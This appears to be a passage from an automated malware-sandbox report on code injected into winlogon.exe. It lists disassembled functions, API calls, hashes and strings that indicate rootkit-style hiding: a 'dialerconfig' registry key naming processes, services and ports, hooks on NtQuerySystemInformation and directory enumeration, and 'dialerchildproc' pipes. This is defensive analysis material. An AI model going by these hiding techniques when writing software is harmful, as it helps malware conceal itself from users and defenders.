                                                        Function 00000225DC64D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: f4e1f7a423249601853f9bf4c02ae152ed9a85bcd9bd447fde6e0ecec31a17ad
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 1531C73A218F90A6DB60DFA9E8443EE73A0F789755F504126EB9E43B94DF38C145CB00
                                                        Function 00000225DC647960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: d33dc497d620ec2850d47fa6d7599d0f75ef197f864d2f2ea1a1538dcd62ba05
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 54113026714F119AEF50CFE8E8593A833A4F719759F440E21DB6D467A4DF78C1A8C380
                                                        Function 00000225DC6ADCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction ID: da0f1b53d22c38e7f028f1682345193667a56556076439a06e8349e4d1e3cf91
                                                        • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction Fuzzy Hash: 3C510926700FE0A9FB20DFBAA84879E7BA5F7447D5F248114EE58A7B95DB38C411C700
                                                        Function 00000225DC64DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction ID: 712154813c46b612020be7a143dde11e41283ee14142f5bab4be78c3f0fa479c
                                                        • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction Fuzzy Hash: 11511A26B0CBA0A9FB20DBBAE84879E7BA1F740BD5F148155EE5927B95DB38C001C700
                                                        Function 00000225DC6236F0 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                        • Instruction ID: fee74b632db8da7adfbcef3e822971e4130eb4171b3ad2da802a4781d9383549
                                                        • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                        • Instruction Fuzzy Hash: EAF062B57146A49EDBA98F6CA80671A77E1F308381FD4C029D68983B04D33C8061CF04
                                                        Function 00000225DC6A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 545a197093dbf33f1111aaff3c94dd347963510d91bf182c1d2d2b3e49a62449
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 1B71FE7A314E24E6EB10DFAAE85869D33B5FB84B8AF109111DE4E97B69DF38C444C740
                                                        Function 00000225DC6A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: d2d635d82ad37731a82d28168a5eda6b08545a77464cd3cb2b7161adfafd8aad
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 22516C7A200F94DAEB54CFAAE54835A77A6F789F9AF148124DE4A47728DF3CC049C700
                                                        Function 00000225DC6412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: fb1b484c7ebee393b1b53cdd5cd81ac2c1ca147a5507fda1b24fca473b782784
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 46515E7A214F9496EB64CFAAE54836A77A1F789F9AF148124DF4A07B58DF3CC045C700
                                                        Function 00000225DC6A1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: bae3e35cc23bdf7e795311711b41c652c83ad71068a264824faefe60a6291ab9
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 583195AC240D6AB0EA46EFEDE8697D46361B70474BF94D023D80986675EF3CC249C350
                                                        Function 00000225DC641D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 52c27ab1b4cc8d1b0b7a026bbb00d0580f7e8789e5eca17ee175a033894297e0
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 9231B8AC518DAAB0EB46EFEDE9597D43361B70434BF90D093940B025B1AF38828AC350
                                                        Function 00000225DC616910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 7539ecd07ed9e19813cea4b70ed8e4e8e5b401edcb5cd18e99020899339b4ff2
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: DF81122D702E71A6FE60EBED944D35962E0EB95783F18C425AB4983797EF38C946C700
                                                        Function 00000225DC676910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 22cde9f525fffbeb1c6e8d8417a217ee6af8dab08b44ae11a5e6f92b2a2e472d
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 5581E26D710E61A6FA54EBEE944D35923D0EB85B82F58C8259B0947FD7EF38C846CB00
                                                        Function 00000225DC6ACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000225DC6ACE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACEBC
                                                        • SetLastError.KERNEL32 ref: 00000225DC6ACED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000225DC6AECCC,?,?,?,?,00000225DC6ABF9F,?,?,?,?,?,00000225DC6A7AB0), ref: 00000225DC6ACF2C
                                                          • Part of subcall function 00000225DC6AD6CC: HeapAlloc.KERNEL32 ref: 00000225DC6AD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF54
                                                          • Part of subcall function 00000225DC6AD744: HeapFree.KERNEL32 ref: 00000225DC6AD75A
                                                          • Part of subcall function 00000225DC6AD744: GetLastError.KERNEL32 ref: 00000225DC6AD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF76
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 16b8eac9f94798cf318e2989be29cf1ddfaa1c447e8d99b4c7a956a79ddaff1c
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 47415868300E6472FE68EBFD565D36922826F887B2F34C724A936C77E6DE39D441D201
                                                        Function 00000225DC64CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000225DC64CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEBC
                                                        • SetLastError.KERNEL32 ref: 00000225DC64CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000225DC64ECCC,?,?,?,?,00000225DC64BF9F,?,?,?,?,?,00000225DC647AB0), ref: 00000225DC64CF2C
                                                          • Part of subcall function 00000225DC64D6CC: HeapAlloc.KERNEL32 ref: 00000225DC64D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF54
                                                          • Part of subcall function 00000225DC64D744: HeapFree.KERNEL32 ref: 00000225DC64D75A
                                                          • Part of subcall function 00000225DC64D744: GetLastError.KERNEL32 ref: 00000225DC64D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF76
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: c96d39c070731bccc58dc25472949b9c8324ede58aceb138708ddbc32eb2cb43
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 3B41AB2C34CE64B6FE68A7FD955D36932825F857B2F24C7A4A937467E6DF388442C200
                                                        Function 00000225DC6A2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 123304303fb7c22e5d95d7b69af9060bb35e9dacbc8375ccdc98a975ab60097a
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 71217F7A614B6092FB14CBA9F54835973A1F789BA6F508215EB5943BA8CF7CC149CB00
                                                        Function 00000225DC642244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 1de5ddcc8f1dfc1167620b25f9dc58926eb66b08d3309719a253bb24b32ba1e0
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 8E215679628F5093F710CBA9F54835977A1F785796F608215DB5903BA4CF7CC145CB00
                                                        Function 00000225DC6AA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 555fb57b5e2f5e687e313f4fed1146f863cabed64c72fa6e629389c121d24878
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 23E1C77A604F50AAFB60DFADD44839D77A0F745799F309116EE8997B9ACB34C182CB00
                                                        Function 00000225DC619944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: ccd8efdbd64409059a3f17658d38d7afc50ea8cd74631e28eb6d2bb9e49f1cd4
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: F3E1D37A602F609AEF60DFA9D48839D77E0F749B8BF108115EE8947B99CB34C592C700
                                                        Function 00000225DC679944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 79a22f26d4f7f371d14ec50af5f62361132822db574cad1d617c9f743099e6d3
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 18E1C17A600F609AEB60DFA9D48839D77E0F749B9AF108915EE8957FD9CB34C492C700
                                                        Function 00000225DC64A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: bf4187be2395a619f89a1bc8f3fca4df6631bddcfcdd61a4c67bb6d669326bcb
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 65E1A47A60CF60AAFB60DFA9D44839D77A4F745799F208155EE8A57B9ACB34C082C700
                                                        Function 00000225DC6AF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 17cc71c834340602f80b56e8e75482b2e164db3fe2ea15b9f73ab924f287fe61
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 4A41C22A311F20A5FB16CBAEA9087553391FB45BA2F258129AE0EC7785EF38C445C316
                                                        Function 00000225DC64F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 4194e3e7209c85e71950454c05d0e0ffaf74f2fe4e207fa6d649fb1745087b51
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: E541F42A32DE20B1EB56CBEEA9087553391BB49BE2F15C125AD0F87785EF38C445C315
                                                        Function 00000225DC6A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
